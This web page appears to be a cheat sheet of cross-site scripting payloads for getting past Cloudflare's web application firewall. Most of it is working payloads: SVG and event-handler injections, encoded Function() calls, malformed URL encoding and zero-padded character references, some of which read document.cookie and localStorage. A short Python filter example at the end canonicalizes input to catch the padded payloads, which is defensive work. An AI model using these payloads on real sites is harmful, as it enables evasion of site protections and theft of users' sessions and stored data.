Cloudflare Xss Bypass Waf

Cloudflare XSS WAF #Bypass

<svg onx=() onload=(confirm)(1)>

<svg onx=() onload=(confirm)(document.cookie)>

<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

"><onx=[] onmouseover=prompt(1)>

Bypass Cloudflare with incorrect URL encoding:

<script>alert()</script> blocked
%2sscript%2ualert()%2s/script%2u -xss popup

New Cloudflare XSS Bypass:

<svg onload=alert%26%230000000040"1")>

"Onx=() onMouSeoVer=prompt(1)>
"Onx=[] onMouSeoVer=prompt(1)>
"/*/Onx=""//onfocus=prompt(1)>
"//Onx=""/*/%01onfocus=prompt(1)>
"%01onClick=prompt(1)>
"%2501onclick=prompt(1)>
"onClick="(prompt)(1)
"Onclick="(prompt(1))
"OnCliCk="(prompt`1`)
"Onclick="([1].map(confirm))

Bypass Pop Up:
[1].map(confirm)
'ale'+'rt'()
a&Tab;l&Tab;e&Tab;r&Tab;t(1)
prompt&lpar;1&rpar;
prompt&#40;1&#41;
prompt%26%2300000000000000000040;1%26%2300000000000000000041;
(prompt())
(prompt``)

Cloudflare XSS bypass by adding 8 or more superfluous leading zeros to a decimal
character reference, or 7 or more to a hex one.
Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>
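Seen from the filter's side, the zero-padded references above only work when a rule inspects the raw bytes instead of what the browser will decode. The following is an added example, not part of the original page and not Cloudflare's rule: HANDLER_CALL is an illustrative signature and the function names are assumptions. It canonicalizes a parameter (URL-decoding plus HTML character references of any digit count, with or without the semicolon) before matching.

```python
import html
import re
from urllib.parse import unquote

# Illustrative signature (an assumption, not any vendor's rule):
# an inline event handler whose value calls a function.
HANDLER_CALL = re.compile(r"\bon[a-z]+\s*=\s*\(?[a-z_$][\w$.]*\)?\s*\(", re.I)

MAX_ROUNDS = 5  # bound the decoding work that nested encodings can force

# The two strings from the "Dec:" and "Hex:" lines of this page.
DEC_SAMPLE = "<svg onload=prompt%26%230000000040document.domain)>"
HEX_SAMPLE = "<svg onload=prompt%26%23x000000028;document.domain)>"
# Constructed benign input, to check for false positives.
BENIGN_SAMPLE = '<a href="/search?q=onions">onions</a>'


def canonicalize(value: str) -> str:
    """Undo URL-encoding and HTML character references until stable."""
    for _ in range(MAX_ROUNDS):
        # html.unescape accepts any number of leading zeros and an
        # optional trailing semicolon, as HTML parsers do.
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def naive_match(value: str) -> bool:
    """Signature applied to the raw parameter, as sent on the wire."""
    return bool(HANDLER_CALL.search(value))


def canonical_match(value: str) -> bool:
    """Signature applied after canonicalization."""
    return bool(HANDLER_CALL.search(canonicalize(value)))


if __name__ == "__main__":
    for name, sample in [("dec", DEC_SAMPLE), ("hex", HEX_SAMPLE),
                         ("benign", BENIGN_SAMPLE)]:
        print(name, naive_match(sample), canonical_match(sample),
              canonicalize(sample))
```

A check like this is only as good as the agreement between its decoding and the browser's, so contextual output encoding in the application remains the control that does not depend on the filter.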
